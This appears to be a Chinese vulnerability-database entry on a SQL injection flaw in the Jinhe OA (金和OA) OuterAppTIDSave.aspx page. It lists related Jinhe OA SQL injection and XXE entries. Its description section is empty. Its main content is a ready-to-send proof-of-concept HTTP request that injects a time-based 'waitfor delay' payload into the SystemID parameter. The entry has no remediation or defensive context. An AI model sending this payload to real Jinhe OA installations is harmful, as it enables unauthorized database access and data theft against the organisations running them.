金和OA OuterAppTIDSave.aspx SQL注入漏洞

漏洞描述

PoC代码

GET /c6/Jhsoft.Web.AddMenu/OuterAppTIDSave.aspx/?SystemID=1'waitfor%20delay'0:0:0'--&OuterAppTID=1&AppTID=1 HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_9) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/43.0.802.0 Safari/534.0

相关漏洞推荐

• 金和OA CustomerImport.aspx 存在XML注入漏洞
• 金和OA blog-XmlDeal XXE漏洞
• 金和OA Jhsoft.Web.blog SQL注入漏洞
• 金和OA XmlPage.aspx 存在XML注入漏洞
• 金和OA ReportSetting.aspx SQL注入漏洞
• 金和OA ReportParaList.aspx SQL注入漏洞
• 金和OA BITypeEdit.aspx SQL注入漏洞
• 金和OA AssTypeSendXML.aspx XXE漏洞
• 金和OA存在SQL注入漏洞
• 金和OA AskDoc.aspx XXE漏洞
• 金和OA AskAttachment.aspx SQL注入漏洞
• 金和OA XmlHttpGetPrintNumber.aspx SQL注入漏洞
• 金和OA Archives-XmlHttp.aspx XXE漏洞